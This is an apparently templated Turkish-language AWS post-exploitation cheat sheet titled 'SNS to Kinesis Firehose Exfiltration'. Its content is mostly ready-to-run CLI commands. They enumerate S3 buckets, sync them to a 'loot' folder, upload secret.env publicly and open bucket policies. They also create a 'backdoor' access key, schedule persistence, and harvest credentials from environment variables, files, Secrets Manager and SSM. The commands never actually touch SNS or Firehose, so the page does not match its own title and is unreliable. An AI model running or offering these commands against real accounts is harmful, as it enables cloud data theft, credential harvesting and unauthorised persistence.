Skip to content

AWS - SNS to Kinesis Firehose Exfiltration (Fanout to S3)

AWS post-ex

AWS - SNS to Kinesis Firehose Exfiltration (Fanout to S3) — AWS ortamında veri/exfil, yan etki ve pivot notudur. Amaç: çağıran kimliği netleştirmek, servise özel saldırı yüzeyini komutlarla doğrulamak ve kanıtlanabilir etki üretmek. Her fence tek komut/payload taşır; çıktıyı hedefe göre uyarla.

  1. Hedef veriyi / trafiği / compute’u seç.

  2. Exfil veya yan etki primitifini çalıştır.

  3. İkinci hesap / iç ağ pivotunu dene.

  4. Kanıt paketini (çıktı, hash, zaman) kaydet.

Önce kim olduğunu ve hangi hesaba/projeye/kontekste oturduğunu kilitle.

Terminal window
aws sts get-caller-identity
Terminal window
aws configure list
Terminal window
echo $AWS_ACCESS_KEY_ID $AWS_SESSION_TOKEN | sed 's/./*/g'

AWS - SNS to Kinesis Firehose Exfiltration (Fanout to S3) için doğrudan uygulanabilir komutlar. Placeholder’ları (BUCKET, ROLE, FN, …) hedef değerlerle değiştir.

Terminal window
aws s3 ls
Terminal window
aws s3 ls s3://BUCKET --no-sign-request
Terminal window
aws s3api get-bucket-acl --bucket BUCKET
Terminal window
aws s3api get-bucket-policy --bucket BUCKET
Terminal window
aws s3api get-public-access-block --bucket BUCKET
Terminal window
aws s3api list-objects-v2 --bucket BUCKET --max-items 50
Terminal window
aws s3 sync s3://BUCKET ./loot
Terminal window
aws s3 cp secret.env s3://BUCKET/ --no-sign-request
Terminal window
aws s3api put-bucket-policy --bucket BUCKET --policy file://open.json
Terminal window
aws s3api list-object-versions --bucket BUCKET
Terminal window
aws s3api get-object --bucket BUCKET --key path/file --version-id VID out
Terminal window
cloud_enum -k company

Erişimi tekrar kullanılabilir kanala çevir veya veriyi dışarı al. İkinci bir oturumdan doğrula.

Terminal window
aws iam create-access-key --user-name backdoor
Terminal window
aws lambda update-function-configuration --function-name FN --layers LAYER_ARN
Terminal window
aws events put-rule --name persist --schedule-expression 'rate(6 hours)'

Env, metadata, secret store ve CI loglarından ikinci kimlik topla; yeni principal ile döngüyü tekrarla.

Terminal window
env | rg -i 'key|secret|token|password|aws_|azure|gcp|kube'
Terminal window
printenv | sort
Terminal window
find / -name '*.pem' -o -name 'credentials' -o -name '*.json' 2>/dev/null | head -n 40
Terminal window
aws secretsmanager list-secrets
Terminal window
aws ssm get-parameters-by-path --path / --recursive --with-decryption

Rapor için yeniden üretilebilir çıktı bırak: komut, zaman, hesap/arn, etki özeti.

request/response veya CLI çıktısı
hesap / proje / cluster
etki: okuma | yazma | RCE | lateral
zaman damgası + dosya hash
Terminal window
mkdir -p evidence/cloud && tee evidence/cloud/notes.txt